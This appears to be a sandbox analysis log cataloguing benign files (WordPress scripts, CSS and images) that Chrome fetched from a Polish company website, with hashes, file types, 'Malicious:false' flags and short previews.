                                                            Preview:/*!. * Isotope PACKAGED v2.2.2. *. * Licensed GPLv3 for open source use. * or Isotope Commercial License for commercial use. *. * http://isotope.metafizzy.co. * Copyright 2015 Metafizzy. */..!function(a){function b(){}function c(a){function c(b){b.prototype.option||(b.prototype.option=function(b){a.isPlainObject(b)&&(this.options=a.extend(!0,this.options,b))})}function e(b,c){a.fn[b]=function(e){if("string"==typeof e){for(var g=d.call(arguments,1),h=0,i=this.length;i>h;h++){var j=this[h],k=a.data(j,b);if(k)if(a.isFunction(k[e])&&"_"!==e.charAt(0)){var l=k[e].apply(k,g);if(void 0!==l)return l}else f("no such method '"+e+"' for "+b+" instance");else f("cannot call methods on "+b+" prior to initialization; attempted to call '"+e+"'")}return this}return this.each(function(){var d=a.data(this,b);d?(d.option(e),d._init()):(d=new c(this,e),a.data(this,b,d))})}}if(a){var f="undefined"==typeof console?b:function(a){console.error(a)};return a.bridget=function(a,b){c(b),e(a,b)},a.bridget}}var d=A
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (32032)
                                                            Category:downloaded
                                                            Size (bytes):56700
                                                            Entropy (8bit):5.284107720882177
                                                            Encrypted:false
                                                            SSDEEP:1536:OYQjF+MMjhPIkwFrHJc2Pyx9b2O68HOkXxEXy7l1pT9Hpyn220DTPRZmtxNpNxCE:s7DY9bfDjv9Hpyn8CmcrM4ODp2
                                                            MD5:762A1784C50432835F00DF7AAB28EA15
                                                            SHA1:8EB5EE603177F30E59D6DF1D0A762A45A58E51AE
                                                            SHA-256:18328CDE99A25DDED575E4FC5486E1D146725D5055D6F47758982892F10E2650
                                                            SHA-512:FCF18F3649818478FBCC1B3989E5DE2786FFAA14B6ED60430AA3A70301728C0202E85B2FBDA650A6B92819CAA20A5FB45197F011E3CDEE8DC720D9B668F822B4
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://canpol.poznan.pl/wp-content/themes/salient/js/caroufredsel.min.js?ver=7.0.1
                                                            Preview:/*. *.jQuery carouFredSel 6.2.1. *.Demo's and documentation:. *.caroufredsel.dev7studios.com. *. *.Copyright (c) 2013 Fred Heusschen. *.www.frebsite.nl. *. *.Dual licensed under the MIT and GPL licenses.. *.http://en.wikipedia.org/wiki/MIT_License. *.http://en.wikipedia.org/wiki/GNU_General_Public_License. */...(function($){function sc_setScroll(a,b,c){return"transition"==c.transition&&"swing"==b&&(b="ease"),{anims:[],duration:a,orgDuration:a,easing:b,startTime:getTime()}}function sc_startScroll(a,b){for(var c=0,d=a.anims.length;d>c;c++){var e=a.anims[c];e&&e[0][b.transition](e[1],a.duration,a.easing,e[2])}}function sc_stopScroll(a,b){is_boolean(b)||(b=!0),is_object(a.pre)&&sc_stopScroll(a.pre,b);for(var c=0,d=a.anims.length;d>c;c++){var e=a.anims[c];e[0].stop(!0),b&&(e[0].css(e[1]),is_function(e[2])&&e[2]())}is_object(a.post)&&sc_stopScroll(a.post,b)}function sc_afterScroll(a,b,c){switch(b&&b.remove(),c.fx){case"fade":case"crossfade":case"cover-fade":case"uncover-fade":a.css("opacity"
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):9866
                                                            Entropy (8bit):5.274488609421968
                                                            Encrypted:false
                                                            SSDEEP:192:To5mtfOLSBihuKYDez8407akBOEXq+4CxpktO9Norr7dFBSrSPfN:dtfOLS8huKYDezU7nr62GtO9Norr7fBH
                                                            MD5:CBAD4EC75D85DF02210165D43D02461B
                                                            SHA1:5C05CFB56BFC7334715F063D596761BAB76AA91A
                                                            SHA-256:DCEDA745A0FB58233A95EFF6D10796026DF6792CB960CDF675EB7B8A6750A2D2
                                                            SHA-512:1764A4EA191AA5F6754911614AF6FCC043FB394C02EFF95D6A2264E12CAA53C6CDA6C8B27547FC792DBFDB48DC14AD63B2AFB23293C17EEBEBD6DB2BF08BF385
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:/*! This file is auto-generated */.this.wp=this.wp||{},this.wp.i18n=function(t){var e={};function n(r){if(e[r])return e[r].exports;var i=e[r]={i:r,l:!1,exports:{}};return t[r].call(i.exports,i,i.exports,n),i.l=!0,i.exports}return n.m=t,n.c=e,n.d=function(t,e,r){n.o(t,e)||Object.defineProperty(t,e,{enumerable:!0,get:r})},n.r=function(t){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(t,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(t,"__esModule",{value:!0})},n.t=function(t,e){if(1&e&&(t=n(t)),8&e)return t;if(4&e&&"object"==typeof t&&t&&t.__esModule)return t;var r=Object.create(null);if(n.r(r),Object.defineProperty(r,"default",{enumerable:!0,value:t}),2&e&&"string"!=typeof t)for(var i in t)n.d(r,i,function(e){return t[e]}.bind(null,i));return r},n.n=function(t){var e=t&&t.__esModule?function(){return t.default}:function(){return t};return n.d(e,"a",e),e},n.o=function(t,e){return Object.prototype.hasOwnProperty.call(t,e)},n.p="",n(n.s="Vhyj")}({"4Z/T":fu
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:PNG image data, 300 x 225, 8-bit/color RGBA, interlaced
                                                            Category:downloaded
                                                            Size (bytes):16061
                                                            Entropy (8bit):7.968373703526925
                                                            Encrypted:false
                                                            SSDEEP:384:IbQyg9Ty2daSkuKvtN3wCOd9Uv0WgT9gCa1j4Jlh:8HkysKftoWrCY8JP
                                                            MD5:EF2DFA52736B985CA5F901D711C83041
                                                            SHA1:BF3D6751205E66EAC8AC16120CB3A59BE9BA1B1C
                                                            SHA-256:B78F2AC51BC0C8BB6CA8EC013C3108AAD454CEAC7ACD61C2B9605932BC6B058B
                                                            SHA-512:06A3284D4BBC1CD073BF4B24BBEEABE601032DF1ED4FF85A829F9DFC2A397160EBD138CDA7BF2695EDFD20EA874F58F34ECEAF132FCD2F8D50EBAAC155D5D4DE
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://canpol.poznan.pl/wp-content/uploads/2015/07/selgros_glowna_thumb.png
                                                            Preview:.PNG........IHDR...,..........{.=....pHYs...#...#.x.?v.. .IDATx.....E.....f....,....D.1..H..1.z.p..1..P....(zb..((H.%...lN....fzg{v.w..nx.....tWWWW........kkk.D.;....Y..H...k;w...E..h%aMM.'.2...~+..\...C...w..VTT4.L.....$......5].......ZKX.nD.g..~:......u..X}...D=z...F...Nc=a.(}B."&F....m.@....k.R....~{.....R..O.-6.r.,'./.'Z. .....w.Y.w..DK...'.^.J.[x........=..~.Ik..._..$...D.oa..l.7......(.w4.El..?...U].~.q..o"b...M..A...V...E5A).r.....',22..3.L'l.....be@MM...=z......DE<...n....(....h.A.x.t..wt/...[UU......h..F..x.....*+.2.0$.{ttt....-VN.#...X.4aHT.~.62Qz..=...w6>-u`.#..+j|Z....N.G..$.,.E..]*V.XQ.o..f.Z.<idz< A.+W..*(h.h*Q.....:ujJ.< A..JT.v....J..XS..hJ?D#..S={6.LIID....jM.../...-....._M../...D..j.4...9...j=...v.e+W.O.-.....=|.e....U....=..,yPwr....,..{.....u...>..Di<0.~.x.h..8/L...8..D/.Ri...Q...v......E4.5..7.w.XJ..s.J.....+{.]..1/...~...8.3.p].....d...1b..i..D!A...h.L.....[....l.M..[......r.;w..H.f.[ITY...G@H3......#.6^.0a.
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:PNG image data, 300 x 225, 8-bit/color RGBA, non-interlaced
                                                            Category:downloaded
                                                            Size (bytes):30757
                                                            Entropy (8bit):7.978363334265698
                                                            Encrypted:false
                                                            SSDEEP:768:DoXxviCPsrPEgmA75S7d21MyRNQY2ikT/rz:DsRHwcgmc5S7GMlYLkTv
                                                            MD5:A2E5641D9B7EFBDEAFB07E7C12F71F69
                                                            SHA1:0300FED7ACC0A21AD5195F14E69A23F13231C913
                                                            SHA-256:6D5BBCF3B85FE7D47DC367EE1DB1C8AF92B2448314F30019199B7359DC0B3E8C
                                                            SHA-512:58350A27DB67BB991D14A64975090C2B2766A2F01B30EE3105B931C08DC654AE4646AFF2585E3862AC979B138F26D4F54FD2CD7C40AC98BE474EB1E3E17AD6C8
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://canpol.poznan.pl/wp-content/uploads/2015/07/disney_winnie_the_pooh.png
                                                            Preview:.PNG........IHDR...,.........r|......bKGD..............pHYs...#...#.x.?v....tIME.....7:=%.... .IDATx...dW...9.\..w.Yd.lv.u.v..........$...y.....&..?....I........J...1......3+}FF.....=..d...f.V.O1X&"n.<y.7......X,...b.X,...b.X,...b.X,...b.X,...b.X,...b.X,...b.X,...b.X,...b.X,...b.X,...b.X,...b.X,...b.X,...b.X,...b.X,...b.X,...b.X,...b.X,...b.X,...b.X,...b.X,...a...........n..~..%..j....2..\..z../..W..._.a...!R.2V..5.r...??88..N..R.\.\.S*..}...."....(......}..>.Z.....,...\...U......v...lnn.G.r.P..h6.va.!....t:.........h4.3+\V.~pn.p8.O..._........~........~.....u.X....h.. V..w.*........]..#..1..<.q...?.'B..].+X.G..Z..|..[......9.(.........~...)..!.0vU.`}_.J......k..+W...<...].6.r...a...!2.*V..s...F..[...+W..6Ve9M..\.v-y....B..X......Y.........+..V.,O...>.h..k..L)..u..`}W.Uy........b.h...T..!._....B..]....K..*.q.._---Y..|).b......7.........m...j..Y.e.---....F,--.e.k.V.0.8vE.`}[.U.s..?;{..]..o..g.s...n......m.......5...u.-_.5l4.................nL&.......?
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:Unicode text, UTF-8 text, with very long lines (16323)
                                                            Category:downloaded
                                                            Size (bytes):16470
                                                            Entropy (8bit):5.1560221328307945
                                                            Encrypted:false
                                                            SSDEEP:192:WtPfqyePEjWePwydyCt3kP1oAGVTbd9KDD79q/yu3kqITOmrvcJT0RL+rV58jYI3:h1PEjZPwEt35AqTbd9c4yu3b3ZrVDNzS
                                                            MD5:38400D9C6BA7D41239FCCFAA9F523558
                                                            SHA1:FE9A1548961441CE82E5399444F2BE5408D2644C
                                                            SHA-256:293913879D30BAB7499013E935009F5183FACBDDD63BFC9656A859622590B80B
                                                            SHA-512:3FA900CDE1E7DF34A418A622D08CD5D9673815C443D575D67F9E1798969AF770A3ED5BB62AEC4267DA0AA293E3FCE0968D15D7BFF17139411CA270B991EC143B
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://canpol.poznan.pl/wp-includes/js/dist/vendor/wp-polyfill.min.js?ver=3.15.0
                                                            Preview:/**. * core-js 3.11.0. * https://github.com/zloirock/core-js. * License: http://rock.mit-license.org. * . 2021 Denis Pushkarev (zloirock.ru). */.!function(S){"use strict";var r,e,o;e={},(o=function(t){if(e[t])return e[t].exports;var n=e[t]={i:t,l:!1,exports:{}};return r[t].call(n.exports,n,n.exports,o),n.l=!0,n.exports}).m=r=[function(t,n,r){r(1),r(69),r(71),t.exports=r(75)},function(t,n,r){var e=r(2),o=r(46),i=r(48),c=r(50),u=r(19),f=r(8),a=r(54),s=function(t,n){var r=this;if(!(r instanceof s))return new s(t,n);i&&(r=i(new Error(S),o(r))),n!==S&&u(r,"message",String(n));n=[];return a(t,n.push,{that:n}),u(r,"errors",n),r};s.prototype=c(Error.prototype,{constructor:f(5,s),message:f(5,""),name:f(5,"AggregateError")}),e({global:!0},{AggregateError:s})},function(t,n,r){var a=r(3),s=r(4).f,p=r(19),l=r(22),g=r(23),v=r(33),y=r(45);t.exports=function(t,n){var r,e,o,i=t.target,c=t.global,u=t.stat,f=c?a:u?a[i]||g(i,{}):(a[i]||{}).prototype;if(f)for(r in n){if(e=n[r],o=t.noTargetGet?(o=s(f,r))&&
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:HTML document, ASCII text, with very long lines (906), with no line terminators
                                                            Category:dropped
                                                            Size (bytes):906
                                                            Entropy (8bit):5.026818215220488
                                                            Encrypted:false
                                                            SSDEEP:24:ck/I7q5yEwf9ga/9WpqEIfayrXac89Wpq9WRpVod91p0yDn:3kF9gw9WsEISy2c89WE9WRpk9P0yD
                                                            MD5:2C6D3B562A48E0DF5474999DD47E58FB
                                                            SHA1:945220E990EB176C14E53CC663FB01E04E31B59F
                                                            SHA-256:3E6131330963C472B950B8AAF544BA3829735B8CCB103D614BA7793E3A786550
                                                            SHA-512:024CE74A723BF2797AA50D957F4E0C6431F04D1AC9AD6B5A45A17835FEBBEC4557AAD95A01AD0D147C8EC0E68DDBD0732E308C529255F266DC5ED7B98C52B6AE
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:!function(e,n){e.wp=e.wp||{},e.wp.mediaelement=new function(){var e={};return{initialize:function(){(e="undefined"!=typeof _wpmejsSettings?n.extend(!0,{},_wpmejsSettings):e).classPrefix="mejs-",e.success=e.success||function(e){var n,t;e.rendererName&&-1!==e.rendererName.indexOf("flash")&&(n=e.attributes.autoplay&&"false"!==e.attributes.autoplay,t=e.attributes.loop&&"false"!==e.attributes.loop,n&&e.addEventListener("canplay",function(){e.play()},!1),t&&e.addEventListener("ended",function(){e.play()},!1))},e.customError=function(e,n){if(-1!==e.rendererName.indexOf("flash")||-1!==e.rendererName.indexOf("flv"))return'<a href="'+n.src+'">'+mejsL10n.strings["mejs.download-file"]+"</a>"},n(".wp-audio-shortcode, .wp-video-shortcode").not(".mejs-container").filter(function(){return!n(this).parent().hasClass("mejs-mediaelement")}).mediaelementplayer(e)}}},n(e.wp.mediaelement.initialize)}(window,jQuery);
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (12987), with no line terminators
                                                            Category:dropped
                                                            Size (bytes):12987
                                                            Entropy (8bit):5.161748864453597
                                                            Encrypted:false
                                                            SSDEEP:384:4v6d5sHteQkJmVUrITdnMrQk2Y18e2pZN5+:6Es8QkJmmrq79YCe2pZN5+
                                                            MD5:6AD9165B167D54947B37F4B9DE75AB39
                                                            SHA1:4C02F66FD8C26141450E310D6786F50F99913DD4
                                                            SHA-256:EEA0B9621509F98BE77C5AF1E9B5C952A675BDA2B27C419876364017069E0C19
                                                            SHA-512:DAE93E3FE93A1E04D65BF1A64DBE7AB4F58938363C9B0D519DDCAA4608C0BEB4DAB995DB8B115E174D8F2B2A539F5DADB0B60D79D96110477CBEF6B172C1AF9C
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:!function(e){var t={};function n(r){if(t[r])return t[r].exports;var o=t[r]={i:r,l:!1,exports:{}};return e[r].call(o.exports,o,o.exports,n),o.l=!0,o.exports}n.m=e,n.c=t,n.d=function(e,t,r){n.o(e,t)||Object.defineProperty(e,t,{enumerable:!0,get:r})},n.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},n.t=function(e,t){if(1&t&&(e=n(e)),8&t)return e;if(4&t&&"object"==typeof e&&e&&e.__esModule)return e;var r=Object.create(null);if(n.r(r),Object.defineProperty(r,"default",{enumerable:!0,value:e}),2&t&&"string"!=typeof e)for(var o in e)n.d(r,o,function(t){return e[t]}.bind(null,o));return r},n.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return n.d(t,"a",t),t},n.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},n.p="",n(n.s=3)}([function(e,t){e.exports=function(e,t,n){return t in e?Object.defineProperty(e,t,{value:n
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 350x350, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=15, description=OLYMPUS DIGITAL CAMERA , manufacturer=OLYMPUS IMAGING CORP. , model=E-M1 , orientation=upper-left, xresolution=267, yresolution=275, resolutionunit=2, software=Adobe Photoshop 7.0 CE, datetime=2018:07:26 12:42:41], progressive, precision 8, 460x390, components 3
                                                            Category:dropped
                                                            Size (bytes):66691
                                                            Entropy (8bit):7.691796796653048
                                                            Encrypted:false
                                                            SSDEEP:768:VSQrSQlwu/YyCWm0k7Y2VEcLUyd+u5PvrPoJGYRL9YH1dFKGrfv447Ol7TtF3u:VSeSY/vm0kYmUMPvrPoAYRLaH1jKcvFF
                                                            MD5:5AC924ADAEEA4722D84DABB8B4878072
                                                            SHA1:EF2FE14876D16B08035857BD2259BBC927903A75
                                                            SHA-256:78716397A5F94788B0DBFB52F09FE8DFD0EB794287A2DDA2106CF5309156386A
                                                            SHA-512:D053D8207EE9954BAD9B640242447376C76B2C87E7923BC63F9945EC750E375EC4C932D53437B72ADEC8026B8519349EA8E3E2B46A44AD2431BAA1B916A2E348
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:......JFIF.....^.^.... BExif..II*........... ...................................................................(...........1...........2.......2...;...@...F...................@...................i...........%...........$...OLYMPUS DIGITAL CAMERA .OLYMPUS IMAGING CORP. .E-M1 .^.......^.......Adobe Photoshop 7.0 CE.2018:07:26 12:42:41.................................................................................................................................PrintIM.0300..%.............................................8.................P.....`... ..................................................................................................... ......................................................'.......'.......'.......'.......'..^....'.......'.......'.......'....................................................................................................................................@@........@@........@@............@@........@@........@@..................
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, comment: "CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 90", baseline, precision 8, 500x500, components 3
                                                            Category:dropped
                                                            Size (bytes):81975
                                                            Entropy (8bit):7.968453704704993
                                                            Encrypted:false
                                                            SSDEEP:1536:bFMrR6B/7y4WN0c4K4oPXNiTKK+hbKELIlZSHNZr6HX+v0a09rw:Jw65WSa4ovNiTTTECkHn+3+v0H9rw
                                                            MD5:DCD6F957D2D5FD5C16884B4F0B9C5C58
                                                            SHA1:8674723A7163FA9938B5C4543209D0C80C201F89
                                                            SHA-256:AC6EC07AFA1AE119279F3542F0098D821DF13E4932E1F4BBB8E3C1F30EBE2D60
                                                            SHA-512:EC6DF7E9DE6DFC5641E0F82B0DA309B1EA8F40AABEB892D4A4BF3F94F5C6B771DF0A66EBAB0F96AFBE8C2737844CC8D3D73C77F55B0C8233D0BEC98D2CE0023D
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 90....C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?......1e#.z..(<I..jp....K.$..$}U.l..C.<;........k!.H...=A.>.....d..x.#.+ilt......Q.....\s.N...k....[..Z1._..../.N-m#[.m'T...B....r..W.....OY~...a..)%..q........a..h,......m...>..zv..K..P..8K..$..c^...)?g#.]Z.^..>.....u]m.F..Gb7K+e...g.....i...O.uW.=?Pe..#..|...q.....j,.oR;..[.0..>`..........N.$\b....
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text
                                                            Category:downloaded
                                                            Size (bytes):10357
                                                            Entropy (8bit):4.908518835709002
                                                            Encrypted:false
                                                            SSDEEP:192:NKVorkJnxJnsHmF5G8bD3LmLfm+vCit50qIyw2dVOXxQ67AaFLOM4VpqMW6MpMGR:yoOF5d/aOny1OFFSqoe4vA
                                                            MD5:2E76374915921089549AFD71CFAF84B5
                                                            SHA1:6F9BCF3C9DA35FCFD940049532359AA4B2120AD5
                                                            SHA-256:5A07EB0D4AB32267E7B6A796331D52876FEB3028E9C7AEDFE1265564E5F529C4
                                                            SHA-512:34728EC224D9B83E2716B458671BC567A2C89F632C03A4FBBDB953A7D6ACB18A398409812A27DD5AE91D97307DB273A35B7E8A4BEF388B583127F3DBEA966AC8
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://canpol.poznan.pl/wp-content/plugins/wp-ultimate-gallery/assets/css/wug-gallery.css?ver=5.8
                                                            Preview:@font-face {. font-family: 'icomoon';. src: url('../fonts/icomoon.eot?ukvbrc');. src: url('../fonts/icomoon.eot?ukvbrc#iefix') format('embedded-opentype'),. url('../fonts/icomoon.ttf?ukvbrc') format('truetype'),. url('../fonts/icomoon.woff?ukvbrc') format('woff'),. url('../fonts/icomoon.svg?ukvbrc#icomoon') format('svg');. font-weight: normal;. font-style: normal;.}.[class^="icomoon-"], [class*=" icomoon-"] {. /* use !important to prevent issues with browser extensions that change fonts */. font-family: 'icomoon' !important;. speak: none;. font-style: normal;. font-weight: normal;. font-variant: normal;. text-transform: none;. line-height: 1;. display: inline-block;. /* Better Font Rendering =========== */. -webkit-font-smoothing: antialiased;. -moz-osx-font-smoothing: grayscale;.}...icomoon-thin-left:before {. content: "\eb8a";.}..icomoon-thin-right:before {. content: "\eb8b";.}..icomoon-spinner:before
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:PNG image data, 300 x 225, 8-bit/color RGBA, interlaced
                                                            Category:downloaded
                                                            Size (bytes):22453
                                                            Entropy (8bit):7.981030882286753
                                                            Encrypted:false
                                                            SSDEEP:384:ItbaFm82/gbuFVdy4OdPrLJSjV4fmCtK3sBkS8Y2A0W7Maz5RcsZwg4Z9YP:o83uFVdZ6nJSCmlZTY2AtMazjiv9Q
                                                            MD5:7241D918B29096CAEE3356C6C266AC7F
                                                            SHA1:B27F15DCAF7C707BCDADE3A62FE329D6F411090C
                                                            SHA-256:E7AE67C307DDE8630927FF4648A837DFA2AC663F92FE9FA2B523BDF5DAC97DFE
                                                            SHA-512:89C37380D879B24151AA496555F50E4EA4392126375DBDF90E49367AE587448761EFEA96B6FAA1CF21BB589D1A294C44D5CDE423089963C70205A74C02A38751
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://canpol.poznan.pl/wp-content/uploads/2015/07/biedronka_glowna_thumb.png
                                                            Preview:.PNG........IHDR...,..........{.=....pHYs...#...#.x.?v.. .IDATx..].`....fv...................{.?{...={..(.(...4i..P..{.d7[g.sg..1@.w.n.O....s..w.{.w...$!.!.....b........I.....|\w..c.5J...4./..k.]?f...K.a........#...w......6z.6......M2.....4T....k/..h.d.o...o.Al...2.x.:h.vV..M..0....@)..'..#.G..8H^/8.."../.!+....y......17..].=.cd...Q.B.....Z......."x...:..2..T.i.....m*...C9....~..o...}.h<.....#..X.........,.....v7.....ws..o(..G%B0u.\~.v.k.eb<./........B.+..)G._.{.....q6S.."..\...Kx.....T.....j...6.u......H.V...z.~.....I.3.y~~w.u.M.6a.aGn.A.E.{.gw'm..#....{....oLU......[.n..#......o.g....x<.O.q.9...;.g.....4(.su.02.. ..F....t@.}&.gE@.#......Q.......#..#...0.#..5..-.C..N..T}..W.u.b.-......NZ.:O....dP..m.X.t.v.[F...K}...36. ....[F%%%..w.0t...Q...v.(rG..}.....o.$.D...Q.Kj....Sl.Zj.z............q3...)..x)..~..Q.?~..c.a]c..J.E...nH^..A...u....Q..^...8.rw..(7..<.o..sv....H.7..F.\._........|..C>V.d....hD/l..h......(....<.:-.z|....R....T7.
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:PNG image data, 300 x 225, 8-bit/color RGBA, interlaced
                                                            Category:dropped
                                                            Size (bytes):21827
                                                            Entropy (8bit):7.97945326575417
                                                            Encrypted:false
                                                            SSDEEP:384:INmITsjhQ0S8h3XxVTyRvo6ENJEFneFJafrgX/JrLVTxz+4W:TITsDS8NhByRv4an0aDm/Jnj64W
                                                            MD5:7D267DD8E8071B058FA0819B43EDAE4F
                                                            SHA1:72CBB81426E33C82362BA66B3086456772C26E6C
                                                            SHA-256:28890C937FD6C5641912E1FA0F045215E2A7D8FED7A7C21EA5498121614CA5BB
                                                            SHA-512:D905305F9F3E55A2E4C1C4D05B569927349CF55D48567E89A5F86B3D338DE64BA93111F2C472EB7DACA9CEA8931712B3D353D21619DC341AAE0BAC92BB44D5CB
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:.PNG........IHDR...,..........{.=....pHYs...#...#.x.?v.. .IDATx...`S....;i.6m...eo.Y.(.`+8p..?.....?..p.D..-...*....gK.n.4;.{_.t.i.4I...M.....=w.+t...E....!.`.}.v...w..[s?....#Xk.....O.k..C....T.f..r;..O..\*...3.}I.,.....J.1.>....>.K......xd.6,]7.m.kH..&..........6..}..^....n........_......Z-...KL.......m...'AT..]....B.a..`.N..}..w.b...p[..).z..T.Z$...RV|.d.LE......0...8.p..[[$T..+(3b.{.=v..3...X.....[.3...5..?... T..k.`..9R...-..X.#..;.-....B*.._..Y.5.)..B&V7.6......v..#<....{.A|..s...:.*.Z..i.9m....f...R.i.&...,Xu%n.|>.._..,..{....KDp.\.7n.t_..,....../..y......B.<x..........|...d..p8.7..x.i.......iz..u.9..Y0"L7.P..P(2.s.jh.k.ym..`D(....B..#%/K..kF..-....u.`...|......p&.....Z.T.8p..O.>Q..mV.I... .iSSSi..d..Piii...:.F&.".O.|.J..s......|Y..o~.OBQ.K......%..!.k....F.3?.$.jg...PU4k.H...m...fX.N<?e..Z@..S_.~.../.\...K......@.!"8B.>-..L.l.X..6N...I.n.6...S.pe/,.....7.K...=.........!.N......-5......w...U.. .`/:D.fXU.ve....p..Q..t9.........'
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 350x350, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=15, description=OLYMPUS DIGITAL CAMERA , manufacturer=OLYMPUS IMAGING CORP. , model=E-M1 , orientation=upper-left, xresolution=267, yresolution=275, resolutionunit=2, software=Adobe Photoshop 7.0 CE, datetime=2018:07:26 12:43:06], progressive, precision 8, 436x401, components 3
                                                            Category:downloaded
                                                            Size (bytes):89958
                                                            Entropy (8bit):7.794304156655165
                                                            Encrypted:false
                                                            SSDEEP:1536:Ey+9+J/SAlph8DBpMKfHRF8sPLZsHh+EoJdpbd9hCR3RMooK1NPHVH:Eyi2bpIpVfD8slmh+/J3bd7CBRMJK1ZF
                                                            MD5:FB955AE85B5EE0A2D6D5D299B94E5781
                                                            SHA1:7D0543A4CF2C6F84003FF7121A7DE472205EE2AA
                                                            SHA-256:14D15516E4D15A66DFFBBDF144320ECCD45978B37927B2CAFFFEC0BC0A7C524C
                                                            SHA-512:5A666B94135BF4E3F2D3C8E3AADF1BD69349BBEC95BC18189F7A68BA30EE35CB2675004090FC7BD1E495FCD379E5D72218BA99E2B9BE61AD29E24025E1CD08D1
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://canpol.poznan.pl/wp-content/uploads/2018/10/zgrzewane.jpg
                                                            Preview:......JFIF.....^.^......Exif..II*........... ...................................................................(...........1...........2.......2...;...@...F...................@...................i...........%...........$...OLYMPUS DIGITAL CAMERA .OLYMPUS IMAGING CORP. .E-M1 .^.......^.......Adobe Photoshop 7.0 CE.2018:07:26 12:43:06.................................................................................................................................PrintIM.0300..%.............................................8.................P.....`... ..................................................................................................... ......................................................'.......'.......'.......'.......'..^....'.......'.......'.......'....................................................................................................................................@@........@@........@@............@@........@@........@@..................
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:PNG image data, 300 x 225, 8-bit/color RGBA, interlaced
                                                            Category:dropped
                                                            Size (bytes):14209
                                                            Entropy (8bit):7.970436096228198
                                                            Encrypted:false
                                                            SSDEEP:384:IBo5BugzWDMKMXThVGSnH2SLbLHbTpAdKUiq1dmTmikhfuL8C9:co5BugqAXTDGg9LvGLx1dmPefuL8C9
                                                            MD5:67B4A7C6A491A7CB3B2B9543D3469745
                                                            SHA1:7415BB6D79B4B523A8A0BA1A50FA40BBADB91E6E
                                                            SHA-256:0487E66B4495D3B6F11DDB483968D8841B1EE914E3959BBA1286D7A1E99E687B
                                                            SHA-512:E6076F190C7E1E5695D8B1760F5E41CF2539AB778A88DE9926C0EB82499597D18D62DA1341A10D04D873BCCD256ACC177DEC4038D113A0EC59E2AECB7BBD4F28
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:.PNG........IHDR...,..........{.=....pHYs...#...#.x.?v.. .IDATx...|.e....%}..$....D...X.^..b.S....o........vz..NO.8."..PT.......}...wf7Y.n...fg...|&...3...7...I.e..S...........{....te}R.3j...A)e ....\.n.O.&L...|..X]].@.....N...p.AY..{..h....;....?zVP....Q.....O.....w.{.}..\.o...].e.^..h\..s1..-Y.D..|.}....1.>..).,.n.Q.`..v....l..{...0..80....@4PX..)..p..X.l....AeC.........a.y...h..~...r.f..b.R..............s.u.......p.5....5..t{`..aE ......1z...GD.\..p.....7..((.........F..~..g..;6$.,n........:....H.D...$..._...3b..Z..p`..`...'>>.D...H.a....50..E..u2(o.x.>4..>...u>.C0#..u>.....K....G...b.-.#G.L.d^M.'..G..J...........UXX(...+1)P@...PP...].F+......PP...:.C.....P.5..._......NYj.......\.-R.....E0b$.....2....4Rvw..|...%..zf...N_.,*.8_i.}...x...a8....].1..0......r:.._D.k.....!....x.d... >\.../...b..X4;4Ay#jB...|. %S.L...3[.....no......$..6l..'.:..........{../.Xu.5..'(7.EEEM......Z.X.z.2...%....d.9...........Y.f....5%!A...........m.......
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (1925)
                                                            Category:dropped
                                                            Size (bytes):2909
                                                            Entropy (8bit):5.481361415987147
                                                            Encrypted:false
                                                            SSDEEP:48:kMGyZlMBuaylJNTSrmwFnzucWak+OYmgQvPvKIUvK16BuUFKDi+kn9du4QXeeA:IuaylJJSrmwVzWeOYmgQnvyy16BCi+SL
